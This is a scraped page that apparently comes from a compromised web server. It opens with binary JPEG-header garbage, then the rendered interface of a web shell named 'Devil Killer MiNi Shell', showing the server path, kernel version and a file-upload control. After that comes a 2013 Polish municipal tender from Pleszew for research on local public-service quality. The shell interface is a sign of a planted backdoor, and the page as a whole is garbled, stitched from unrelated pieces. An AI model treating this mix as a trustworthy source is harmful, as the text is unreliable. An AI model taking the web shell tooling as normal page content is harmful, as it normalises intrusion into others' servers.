JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130919/380546-N-2013.html

<p class="kh_header"><b>Pleszew: Wykonanie badań jakościowych i ilościowych w ramach realizacji projektu pn. Diagnoza jakości usług publicznych na Ziemi Pleszewskiej</b><br>
<b>Numer ogłoszenia: 380546 - 2013; data zamieszczenia: 19.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto i Gmina Pleszew , Rynek 1, 63-300 Pleszew, woj. wielkopolskie, tel. (062) 74 28 300, faks (062) 74 28 301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pleszew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie badań jakościowych i ilościowych w ramach realizacji projektu pn. Diagnoza jakości usług publicznych na Ziemi Pleszewskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie badań jakościowych i ilościowych w  ramach realizacji projektu Miasta i Gminy Pleszew pn. Diagnoza jakości usług publicznych na Ziemi Pleszewskiej w ramach Programu Operacyjnego Pomoc Techniczna 2007-2013, którego głównym celem jest wzmocnienie zdolności jednostek samorządu terytorialnego w 6 gminach Powiatu Pleszewskiego (Miasto i Gmina Pleszew, Gminy: Czermin, Chocz, Dobrzyca, Gizałki, Gołuchów) do świadczenia usług publicznych o wysokiej dostępności i jakości.Przedmiot zamówienia składa się z dwóch następujących etapów:
a)ETAP I Przedmiotem Etapu I jest wykonanie badań jakościowych. Badania jakościowe składają się z 3 modułów: Moduł I - badanie FGI, Moduł II - badanie IDI, Moduł III - raport z badań jakościowych.
MODUŁ I - szczegółowy opis:
-przedmiotem zamówienia jest przeprowadzenie badania jakościowego w postaci 3 zogniskowanych wywiadów grupowych (FGI);
-wykonawca jest zobowiązany do przeprowadzenia badań empirycznych metodą FGI i dokonania transkrypcji wywiadów;
-badanie jakościowe FGI należy przeprowadzić dla 3 obszarów tematycznych:
usługi społeczne - edukacja, kultura, zdrowie, mieszkalnictwo,
usługi techniczne - komunikacja, usługi komunalne,
usługi administracyjne - np. decyzje, zezwolenia, opinie
-badanie w każdym obszarów musi obejmować następujące zagadnienia:
możliwość i zasadność zwiększenia zaangażowania podmiotów zewnętrznych (organizacji pozarządowych, podmiotów ekonomii społecznej, prywatnych przedsiębiorców, grup obywateli itp.) w świadczenie usług publicznych,
społeczne zapotrzebowania na wybrane usługi publiczne, w tym priorytetyzacja potrzeb,
możliwości zwiększenia koordynacji działań instytucji świadczących różne usługi na poziomie lokalnym,
-badaniem mają zostać objęte 3 odrębne grupy, a każda grupa ma składać się z 12 osób. Do każdej grupy musi zostać przydzielony moderator. W skład grupy mają wejść przedstawiciele 6 gmin Powiatu Pleszewskiego (miasto i Gmina Pleszew, Gmina Chocz, Gmina Czermin, Gmina Dobrzyca, Gmina Gizałki, Gmina Gołuchów). Każdą gminę mają reprezentować 2 osoby (mieszkaniec gminy lub pracownik urzędu danej gminy);
-wykonawca jest zobowiązany do dokonania wyboru poszczególnych przedstawicieli z 6 gmin Powiatu Pleszewskiego;
-wykonawca zobowiązany jest do zapewnienia pomieszczenia celem przeprowadzenia zogniskowanych wywiadów grupowych z zastrzeżeniem iż miejscem spotkań może być tylko Miasto i Gmina Pleszew; 
-wykonawca zobowiązany jest do powiadomienia wybranych osób o terminie i miejscu przeprowadzenia zogniskowanego wywiadu grupowego oraz do poinformowania Zamawiającego o terminie i miejscu spotkań poszczególnych grup w terminie do 5 dni kalendarzowych przed spotkaniem;
-każda grupa ma zrealizować badania FGI w jednym obszarze tematycznym usług publicznych wskazanym przez Zamawiającego (moduł I tiret 3);
-wykonawca w terminie do 5 dni kalendarzowych od podpisania umowy zobligowany jest do przedstawienia Zamawiającemu do akceptacji scenariuszy wywiadów grupowych dla poszczególnych obszarów tematycznych; scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-w terminie do 3 dni kalendarzowych Zamawiający zaakceptuje przekazany scenariusz wywiadu lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania. Poprawione scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
MODUŁ II - szczegółowy opis:
-przedmiotem zamówienia jest przeprowadzenie badania jakościowego w postaci 108 pogłębionych wywiadów indywidualnych (IDI);
-wykonawca jest zobowiązany do przeprowadzenia badań empirycznych metodą IDI i dokonania transkrypcji wywiadów,
-indywidualne wywiady pogłębione zostaną przeprowadzone dla następujących obszarów tematycznych:
usługi społeczne - edukacja, kultura, zdrowie, mieszkalnictwo
usługi techniczne - komunikacja, usługi komunalne
usługi administracyjne - np. decyzje, zezwolenia, opinie;
-badanie w każdym obszarów z obszarów musi obejmować następujące zagadnienia:
możliwość i zasadność zwiększenia zaangażowania podmiotów zewnętrznych (organizacji pozarządowych, podmiotów ekonomii społecznej, prywatnych przedsiębiorców, grup obywateli itp.) w świadczenie usług publicznych,
społeczne zapotrzebowanie na wybrane usługi publiczne, w tym priorytetyzacja potrzeb,
możliwości zwiększenia koordynacji działań instytucji świadczących różne usługi na poziomie lokalnym;
w każdym z obszarów wskazanych przez Zamawiającego (moduł II tiret 3) ma zostać przeprowadzone 36 wywiadów;
-Zamawiający określa, że z każdej z wymienionych jst (Miasto i Gmina Pleszew, Gmina Chocz, Gmina Dobrzyca, Gmina Czermin, Gmina Gizałki, Gmina Gołuchów) udział w badaniu określonego obszaru tematycznego wezmą 3 osoby (tj. 1 pracownik JST, 1 przedstawiciel NGO, 1 przedstawiciel MSP);
-Zamawiający założył, że każde badanie IDI zostanie wykonane 2 razy dla każdej osoby:
-Pierwsza tura indywidualnych wywiadów pogłębionych ma służyć przygotowaniu problemów badawczych do badań ilościowych;
-Druga tura indywidualnych wywiadów pogłębionych ma służyć formułowaniu wniosków i zaleceń końcowych do wdrożenia docelowego modelu zarządzania jakością usług publicznych;
-wykonawca zobowiązany jest do dokonania wyboru poszczególnych przedstawicieli zgodnie z wymaganiami Zamawiającego;
-wykonawca zobowiązany jest do zapewnienia pomieszczenia celem przeprowadzenia indywidualnych wywiadów pogłębionych oraz do powiadomienia wybranych osób o terminie i miejscu przeprowadzenia badania IDI;
-w terminie do 5 dni kalendarzowych od podpisania umowy Wykonawca zobligowany jest do przedstawienia Zamawiającemu do akceptacji scenariuszy dla I tury indywidualnych wywiadów pogłębionych; scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-w terminie do 3 dni kalendarzowych Zamawiający zaakceptuje przekazane scenariusze wywiadu lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania; poprawione scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-wykonawca zobligowany jest w terminie do 20 dni kalendarzowych od dnia podpisania umowy do przedstawienia Zamawiającemu do akceptacji scenariuszy dla II tury indywidualnych wywiadów pogłębionych; scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-zamawiający w terminie do 3 dni kalendarzowych zaakceptuje przekazane scenariusze wywiadu lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania. Poprawione scenariusze należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
MODUŁ III - szczegółowy opis:przedmiotem modułu jest sporządzenie raportu w terminie do 35 dni kalendarzowych od podpisania umowy zawierającego odpowiedzi na problemy badawcze wraz z rekomendacjami uwzględniającego badania jakościowe w formie zogniskowanych wywiadów grupowych (FGI) oraz badania jakościowe w formie indywidualnych wywiadów pogłębionych (IDI). Raport należy przekazać w wersji papierowej (3 egz.)  i elektronicznej (format doc i pdf) na nośniku CD/DVD (3 szt.);
Raport z badań jakościowych powinien zawierać co najmniej następujące elementy:
-Cel badania.
-Metoda badań oraz dobór próby.
-Streszczenie z przeprowadzonych badań.
-Analiza i wnioski z przeprowadzonych badań jakościowych FGI i IDI.
-Odpowiedzi na następujące zagadnienia:
możliwość i zasadność zwiększenia zaangażowania podmiotów zewnętrznych (organizacji pozarządowych, podmiotów ekonomii społecznej, prywatnych przedsiębiorców, grup obywateli itp.) w świadczenie usług publicznych,
społeczne zapotrzebowania na wybrane usługi publiczne, w tym priorytetyzacja potrzeb,
możliwości zwiększenia koordynacji działań instytucji świadczących różne usługi na poziomie lokalnym,
Przedstawienie problemów badawczych do badań ilościowych. 
Sformułowanie wniosków i zaleceń końcowych do wdrożenia.
Objętość raportu powinna wynosić co najmniej 2,5 arkusza wydawniczego. 
-zamawiający w terminie do 3 dni kalendarzowych zaakceptuje przekazany raport lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania i przekazać Zamawiającemu ponownie raport w wersji papierowej (3 egz.) i elektronicznej (format doc i pdf) na nośniku CD/DVD (3 szt.).

b)ETAP II
-przedmiotem etapu II jest przeprowadzenie badania ilościowego techniką wywiadu kwestionariuszowego zrealizowanego przez ankietera (PAPI) w miejscu zamieszkania respondenta;
-celem badania jest postawienie diagnozy stanu jakości usług publicznych oraz wypracowanie optymalnych wskaźników do ich mierzenia, monitorowania i w konsekwencji wdrożenia docelowego modelu zarządzania jakością usług publicznych JST. Zakłada się, że projekt spełni cele: 
deskryptywne, czyli opisujące i diagnozujące stan usług publicznych (w grupach: społeczne, techniczne i administracyjne) w 6 gminach powiatu pleszewskiego;
prognostyczne w zakresie przewidywania trendów rozwoju usług publicznych ze szczególnym uwzględnieniem usług w analizowanych grupach w perspektywie czasowej do roku 2024;
rekomendujące nowe sytuacje i korzystne rozwiązania, które mają przyczynić się w istotny sposób do rozwoju i poprawy dostępności i jakości usług publicznych jednostek samorządu terytorialnego biorących udział w projekcie;
-przedmiotem badania jest reprezentatywna próba (losowo-warstwowa) dorosłych mieszkańców Miasta i Gminy Pleszew, Gminy Chocz, Gminy Czermin, Gminy Dobrzyca, Gminy Gizałki i Gminy Gołuchów wybrana ze zbioru PESEL;
UWAGA!!!! 
Dane ze zbioru PESEL muszą być pozyskane zgodnie z ustawą z dnia 10 kwietnia 1974 r. o ewidencji ludności i dowodach osobistych (Dz. U. z 2006 r., Nr 139, poz. 993 ze zm.)
-liczebność próby N=3000, przy czym należy zbadać po 500 respondentów z każdej z gmin określonych  powyżej przez Zamawiającego;
-założenia reprezentatywności próby: zakładany błąd oszacowania dla każdej z prób nie większy niż e=4,4%, poziomie ufności N=95%, procentowy udział zjawiska w populacji generalnej P=50% oraz odchylenia populacji od próby ze względu na płeć i wiek (w przedziałach 18-24, 25-34, 35-45, 45-54, 55-65 i 66 i więcej) nie większe niż 1 punkt procentowy;
-tematyka badania: diagnoza stanu jakości usług publicznych świadczonych przez jst w następujących grupach:
usługi  społeczne - edukacja, kultura, zdrowie, mieszkalnictwo,
usługi techniczne - komunikacja, usługi komunalne,
usługi administracyjne. decyzje, zezwolenia, opinie;
techniki analizy statystycznej: weryfikacja stawianych hipotez badawczych, szukanie związków i zależności między zmiennymi, formułowanie wniosków;
-kwestionariusz powinien zawierać min. 35 pytań oraz nie mniej niż 150 zmiennych. W terminie do 47 dni kalendarzowych od podpisania umowy Wykonawca przekaże Zamawiającemu kwestionariusz badawczy; kwestionariusz należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-Wykonawca w terminie do 3 dni kalendarzowych zaakceptuje przekazany kwestionariusz lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania; poprawiony kwestionariusz należy przekazać w wersji elektronicznej emailem na adres: liskowski@pleszew.pl lub w wersji papierowej do Sekretariatu Zamawiającego.
-Wykonawca w terminie do 82 dni kalendarzowych od podpisania umowy zobowiązany jest do przekazania 6 raportów cząstkowych z badań ilościowych z każdej gminy N=500) - każdy w wersji papierowej (3 egz.) i elektronicznej (format doc i pdf) na nośniku CD/DVD (3 szt.). Równocześnie do każdego raportu cząstkowego Wykonawca przekazuje prezentację multimedialną, nie mniej niż 45 slajdów (zawierającą podsumowanie raportu) w wersji papierowej (3 egz.) i elektronicznej (format ppt i pdf) na nośniku CD/DVD (3 szt.).
-Zamawiający w terminie do 3 dni kalendarzowych zaakceptuje przekazane raporty cząstkowe i prezentacje multimedialne lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do 2 dni kalendarzowych od daty ich przesłania i przekazać Zamawiającemu ponownie raport i prezentacje multimedialne w wersji papierowej (3 egz.) i elektronicznej (format doc/ppt i pdf) na nośniku CD/DVD (3 szt.) 
-Wykonawca w terminie do 82 dni kalendarzowych od podpisania umowy zobowiązany jest do przekazania raportu końcowego z badań ilościowych dla całego badanego obszaru (N=3000) wraz z wnioskami i rekomendacjami. Raport końcowy należy przekazać w wersji papierowej (3 egz.) i elektronicznej (format doc i pdf) na nośniku CD/DVD (3 szt.);

Raport końcowy z badań ilościowych powinien zawierać co najmniej następujące elementy:
1.Cel badania.
2.Metoda badań oraz dobór próby.
3.Streszczenie przeprowadzonych badań.
4.Analiza i wnioski z przeprowadzonych badań.
5.Rekomendacje i zalecenia do wdrożenia.
Objętość raportu końcowego powinna wynosić co najmniej 2,5 arkusza wydawniczego. 
-Zamawiający w terminie do 3 dni kalendarzowych zaakceptuje przekazany raport lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie do  2 dni kalendarzowych od daty ich przesłania i przekazać Zamawiającemu ponownie raport końcowy z badań ilościowych dla całego badanego obszaru (N=3000) wraz z wnioskami i rekomendacjami w wersji papierowej (3 egzemplarze) i elektronicznej (format doc i pdf) na nośniku CD/DVD (3 szt.).

Przedmiotowe materiały powinny zawierać informację, że zadanie jest realizowane przy współfinansowaniu ze środków Unii Europejskiej przyznanych w ramach Konkursu dotacji dla JST ogłoszonego przez Ministerstwo Rozwoju Regionalnego oraz logo Unii Europejskiej i logo POPT 2007-2013 wraz z informacją o współfinansowaniu projektu ze środków Unii Europejskiej, umieszczona proporcjonalnie do wielkości innych oznaczeń, w sposób zapewniający jego dobrą widoczność, zgodnie z treścią Podstawowych zasad oznakowania projektów finansowanych ze środków Programu Pomoc Techniczna 2007 -2013. (wzór przekazany zostanie przez Zamawiającego na etapie podpisywania umowy z wybranym wykonawcą)..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 87.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert (lub w okresie prowadzenia działalności, jeżeli jest ona prowadzona przez okres krótszy niż trzy lata) w sposób należyty wykonali co najmniej 2 usługi o wartości min. 70.000 zł brutto (każda) z których każda uwzględniała wykonanie badań ilościowych oraz badań jakościowych w postaci indywidualnych wywiadów pogłębionych (IDI) lub w postaci zogniskowanych wywiadów grupowych (FGI); Zamawiający dokona oceny spełniania w/w warunku na podstawie dokumentów załączonych przez Wykonawcę do oferty. Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana wg formuły spełnia - nie spełnia. Przy ocenie spełniania tego warunku zastosowanie ma art. 26 ust. 2b ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia. Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.Zamawiający dokona oceny spełniania w/w warunku na podstawie oświadczenia Wykonawcy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania dotyczy usług niezbędnych do wykazania spełnienia warunku określonego w pkt. III.3.2., tj. 2 usługi o wartości min. 70.000 zł brutto (każda) z których każda uwzględniała wykonanie badań ilościowych oraz badań jakościowych w postaci indywidualnych wywiadów pogłębionych (IDI) lub w postaci zogniskowanych wywiadów grupowych (FGI);;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Informacja o podwykonawcach, Formularz cenowy, Pełnomocnictwo (jeżeli dotyczy), Jeżeli Wykonawca, wykazując spełnianie warunków , o których mowa w art. 22 ust. 1 ustawy , polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny czy Wykonawca będzie dysponował zasobami innych podmiotóww stopniu niezbędnym dla należytego wykonania zamówienia, żąda określenia w pisemnym zobowiązaniu podmiotu trzeciego lub innym dokumencie:
zakresu dostępnych wykonawcy zasobów innego podmiotu,
sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia,
zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.pleszew.pl/pleszewm/bip/zamowienia-publiczne.html<br>
